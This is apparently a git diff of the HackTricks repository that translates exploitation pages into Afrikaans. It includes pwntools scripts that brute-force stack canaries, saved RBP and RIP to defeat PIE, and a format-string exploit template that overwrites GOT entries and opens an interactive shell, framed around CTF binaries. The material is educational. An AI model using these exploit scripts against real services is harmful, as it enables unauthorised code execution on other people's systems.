* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

30
emails-vulns.md
View file

@ -1,16 +1,16 @@
# Emails Vulnerabilities
# E-poskwesbaarhede
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
@ -20,14 +20,14 @@ Other ways to support HackTricks:
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

900
exploiting/linux-exploiting-basic-esp/README.md
View file

File diff suppressed because it is too large Load diff

185
exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md
View file

@ -1,114 +1,109 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
**As jy te doen het met 'n binêre lêer wat beskerm word deur 'n kanarie en PIE (Position Independent Executable), moet jy waarskynlik 'n manier vind om dit te omseil.**
![](<../../.gitbook/assets/image (144).png>)
{% hint style="info" %}
Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\
However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting.
Let daarop dat **`checksec`** dalk nie kan vind dat 'n binêre lêer beskerm word deur 'n kanarie as dit staties gekompileer is en nie in staat is om die funksie te identifiseer nie.\
Jy kan egter handmatig hiervan bewus raak as jy vind dat 'n waarde aan die begin van 'n funksieoproep in die stapel gestoor word en hierdie waarde voor die uittrede nagegaan word.
{% endhint %}
# Brute force Canary
The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**.
Die beste manier om 'n eenvoudige kanarie te omseil, is as die binêre lêer 'n program is wat **kindprosesse vorm elke keer as jy 'n nuwe verbinding** daarmee vestig (netwerkdienste), omdat elke keer as jy daarmee verbind, **dezelfde kanarie gebruik sal word**.
Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**):
Dan is die beste manier om die kanarie te omseil, om dit net **karakter vir karakter te brute force**, en jy kan uitvind of die gerade kanariebyte korrek was deur te kyk of die program afgekraak het of sy normale vloei voortgaan. In hierdie voorbeeld **brute force** die funksie **'n 8 byte kanarie (x64)** en onderskei tussen 'n korrek gerade byte en 'n slegte byte deur net te **kyk** of 'n **reaksie** deur die bediener teruggestuur word (in 'n **ander situasie** kan 'n **try/except** gebruik word):
## Example 1
This example is implemented for 64bits but could be easily implemented for 32 bits.
## Voorbeeld 1
Hierdie voorbeeld is geïmplementeer vir 64-bits, maar kan maklik geïmplementeer word vir 32-bits.
```python
from pwn import *
def connect():
r = remote("localhost", 8788)
r = remote("localhost", 8788)
def get_bf(base):
canary = ""
guess = 0x0
base += canary
canary = ""
guess = 0x0
base += canary
while len(canary) < 8:
while guess != 0xff:
r = connect()
while len(canary) < 8:
while guess != 0xff:
r = connect()
r.recvuntil("Username: ")
r.send(base + chr(guess))
r.recvuntil("Username: ")
r.send(base + chr(guess))
if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()
if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()
print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base
print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base
canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
```
## Voorbeeld 2
## Example 2
This is implemented for 32 bits, but this could be easily changed to 64bits.\
Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload.
Dit is geïmplementeer vir 32-bits, maar dit kan maklik verander word na 64-bits.\
Merk ook op dat vir hierdie voorbeeld die **program verwag eers 'n byte om die grootte van die inset aan te dui** en die payload.
```python
from pwn import *
# Here is the function to brute force the canary
def breakCanary():
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21
for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21
# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break
# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))
# Return the canary
return known_canary
# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break
# Return the canary
return known_canary
# Start the target process
target = process('./feedme')
@ -118,24 +113,22 @@ target = process('./feedme')
canary = breakCanary()
log.info(f"The canary is: {canary}")
```
# Druk Kanarie
# Print Canary
'n Ander manier om die kanarie te omseil is om dit te **druk**.\
Stel jou 'n situasie voor waar 'n **program vatbaar** vir stapoorvloei 'n **puts**-funksie kan uitvoer wat na 'n **deel** van die **stapoorvloei** wys. Die aanvaller weet dat die **eerste byte van die kanarie 'n nulbyte** (`\x00`) is en die res van die kanarie **willekeurige** bytes is. Dan kan die aanvaller 'n oorvloei skep wat die stapoorvloei oorskryf totdat net die eerste byte van die kanarie oorbly.\
Dan roep die aanvaller die puts-funksionaliteit aan op die middel van die nutlading wat al die kanarie sal **druk** (behalwe die eerste nulbyte).\
Met hierdie inligting kan die aanvaller 'n nuwe aanval **skep en stuur**, met kennis van die kanarie (in dieselfde programsessie).
Another way to bypass the canary is to **print it**.\
Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\
Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte).\
With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session)
Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\
CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)
Dit is duidelik dat hierdie taktiek baie **beperk** is, aangesien die aanvaller in staat moet wees om die **inhoud** van sy **nutlading** te **druk** om die **kanarie** uit te voer en dan 'n nuwe nutlading (in dieselfde programsessie) te skep en te **stuur** om die werklike stapoorvloei te veroorsaak.\
CTF-voorbeeld: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)
# PIE
In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\
For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.**
To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP:
Om die PIE te omseil, moet jy **'n adres uitlek**. En as die binêre lêer nie enige adresse uitlek nie, is die beste om dit te doen om die **RBP en RIP wat in die stapel gestoor is, deur middel van bruto-krag** in die vatbare funksie te raai.\
Byvoorbeeld, as 'n binêre lêer beskerm word deur beide 'n **kanarie** en **PIE**, kan jy begin om die kanarie bruto-krag te gebruik, dan sal die **volgende** 8 byte (x64) die gestoorde **RBP** wees en die **volgende** 8 byte sal die gestoorde **RIP** wees.
Om die RBP en die RIP van die binêre lêer bruto-krag te gebruik, kan jy uitvind dat 'n geldige geradeerde byte korrek is as die program iets uitvoer of net nie afkraak nie. Dieselfde funksie as die een wat voorsien is vir die bruto-krag van die kanarie, kan gebruik word om die RBP en die RIP bruto-krag te gebruik:
```python
print("Brute-Forcing RBP")
base_canary_rbp = get_bf(base_canary)
@ -144,41 +137,33 @@ print("Brute-Forcing RIP")
base_canary_rbp_rip = get_bf(base_canary_rbp)
RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
```
## Kry basisadres
## Get base address
The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**.
From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP:
Die laaste ding wat jy nodig het om die PIE te oorwin, is om nuttige adresse van die uitgelekde adresse te bereken: die RBP en die RIP.
Vanaf die RBP kan jy bereken waar jy jou skulp in die stapel skryf. Dit kan baie nuttig wees om te weet waar jy die string _"/bin/sh\x00"_ binne die stapel gaan skryf. Om die afstand tussen die uitgelekde RBP en jou skulpkode te bereken, kan jy net 'n breekpunt plaas nadat die RBP uitgelek is en kyk waar jou skulpkode geleë is. Dan kan jy die afstand tussen die skulpkode en die RBP bereken:
```python
INI_SHELLCODE = RBP - 1152
```
From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\
To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses:
Vanaf die **RIP** kan jy die **basisadres van die PIE-binêre lêer** bereken, wat jy nodig gaan hê om 'n **geldige ROP-ketting** te skep.\
Om die basisadres te bereken, voer eenvoudig `objdump -d vunbinary` uit en kyk na die ontleedde jongste adresse:
![](<../../.gitbook/assets/image (145).png>)
In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked _0x562002970**ecf** _ the base address is _0x562002970**000**_
In daardie voorbeeld kan jy sien dat slegs **1 byte en 'n half nodig is** om al die kode te lokaliseer, dus sal die basisadres in hierdie situasie die **uitgelekke RIP wees, maar eindig op "000"**. Byvoorbeeld, as jy _0x562002970**ecf**_ uitgelek het, is die basisadres _0x562002970**000**_.
```python
elf.address = RIP - (RIP & 0xfff)
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

125
exploiting/linux-exploiting-basic-esp/format-strings-template.md
View file

@ -1,20 +1,16 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
```python
from pwn import *
from time import sleep
@ -49,23 +45,23 @@ print(" ====================== ")
def connect_binary():
global P, ELF_LOADED, ROP_LOADED
global P, ELF_LOADED, ROP_LOADED
if LOCAL:
P = process(LOCAL_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
if LOCAL:
P = process(LOCAL_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP:
P = remote('10.10.10.10',1338) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP:
P = remote('10.10.10.10',1338) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTESSH:
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(elf)# Find ROP gadgets
elif REMOTESSH:
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(elf)# Find ROP gadgets
#######################################
@ -73,39 +69,39 @@ def connect_binary():
#######################################
def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
log.info("payload = %s" % repr(payload))
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
P.sendline(payload)
sleep(0.5)
return P.recv()
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
log.info("payload = %s" % repr(payload))
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
P.sendline(payload)
sleep(0.5)
return P.recv()
def get_formatstring_config():
global P
global P
for offset in range(1,1000):
connect_binary()
P.clean()
for offset in range(1,1000):
connect_binary()
P.clean()
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
if b"41" in recieved:
for padlen in range(0,4):
if b"41414141" in recieved:
connect_binary()
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
print(recieved)
if b"42424242" in recieved:
log.info(f"Found offset ({offset}) and padlen ({padlen})")
return offset, padlen
if b"41" in recieved:
for padlen in range(0,4):
if b"41414141" in recieved:
connect_binary()
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
print(recieved)
if b"42424242" in recieved:
log.info(f"Found offset ({offset}) and padlen ({padlen})")
return offset, padlen
else:
connect_binary()
payload = b" " + payload
recieved = send_payload(payload).strip()
else:
connect_binary()
payload = b" " + payload
recieved = send_payload(payload).strip()
# In order to exploit a format string you need to find a position where part of your payload
@ -138,10 +134,10 @@ log.info(f"Printf GOT address: {hex(P_GOT)}")
connect_binary()
if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue
# You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
sleep(5)
# attach gdb and continue
# You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
sleep(5)
format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES)
#format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR)
@ -153,21 +149,16 @@ format_string.execute_writes()
P.interactive()
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

76
exploiting/linux-exploiting-basic-esp/fusion.md
View file

@ -1,16 +1,14 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
